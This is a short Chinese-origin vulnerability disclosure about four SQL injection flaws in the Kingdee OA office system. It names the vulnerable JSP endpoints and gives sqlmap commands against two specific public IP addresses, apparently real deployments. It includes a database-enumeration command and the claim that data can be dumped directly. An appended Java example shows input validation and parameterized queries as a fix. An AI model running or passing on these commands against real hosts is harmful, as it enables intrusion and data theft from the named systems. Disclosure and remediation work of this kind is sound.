
Four High-Risk SQL Injection Vulnerabilities in the Kingdee OA Office System

2015/10/29 Author: WooYun Source: collected from the web
Introduction: Where SQL injection appears, it has to be fixed.

  The following files are vulnerable:

 /kingdee/control/netcom_out_del.jsp?del_id=1,1* (del_id parameter)

 /kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1 (index_id parameter)

 /kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1 (netcom_id parameter)

 /kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1 (netcom_key and index_id parameters)

  0x01 SQL injection 1

  sqlmap.py -u http://221.226.149.17:8080/kingdee/control/netcom_out_del.jsp?del_id=1,1*

      

  0x02 SQL injection 2

  sqlmap.py -u http://222.133.44.10:8080/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1

       

  0x03 SQL injection 3

  sqlmap.py -u http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1


      

  0x04 SQL injection 4

  sqlmap.py -u http://221.226.149.17:8080/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1111

     

sqlmap.py -u "http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1" --dbs

  Several example cases:


  The data can be dumped directly with SQLMAP.

         

   Fix:

   Filter the input.
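
The fix above says only to filter. One way to do that for the del_id parameter, as an added example that is not code from the original post or from Kingdee: accept nothing but a comma-separated list of integers and bind each value through a PreparedStatement. The table name netcom_out, the column id and the class name are assumptions, since the page does not show the JSP source.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

// Added example. Assumed (not shown on the page): the JSP builds its SQL by
// concatenating request.getParameter("del_id"); table/column names are hypothetical.
public class NetcomOutDelFilter {

    // Strict allow-list: ASCII digits separated by single commas, nothing else.
    static List<Long> parseIdList(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,18}(,[0-9]{1,18})*")) {
            throw new IllegalArgumentException("del_id must be integers separated by commas");
        }
        List<Long> ids = new ArrayList<>();
        for (String part : raw.split(",")) ids.add(Long.parseLong(part));
        return ids;
    }

    // One "?" per id, so the statement text never contains request data.
    static String deleteSql(int count) {
        return "DELETE FROM netcom_out WHERE id IN ("
                + String.join(",", Collections.nCopies(count, "?")) + ")";
    }

    // Validates the raw parameter, then binds every id as a typed value.
    static int deleteByIds(Connection conn, String rawDelId) throws SQLException {
        List<Long> ids = parseIdList(rawDelId);
        try (PreparedStatement ps = conn.prepareStatement(deleteSql(ids.size()))) {
            for (int i = 0; i < ids.size(); i++) ps.setLong(i + 1, ids.get(i));
            return ps.executeUpdate();
        }
    }

    public static void main(String[] args) {
        // Constructed inputs; "1,1*" is the del_id value shown on the page.
        for (String raw : new String[] {"1,1", "42", "1,1*", "1,,2", "abc"}) {
            try {
                List<Long> ids = parseIdList(raw);
                System.out.println(raw + " -> " + ids + " | " + deleteSql(ids.size()));
            } catch (IllegalArgumentException e) {
                System.out.println(raw + " -> rejected");
            }
        }
    }
}
```

The same pattern applies to index_id, netcom_id and netcom_key: validate the expected type first, then pass the value as a bound parameter rather than as part of the SQL string.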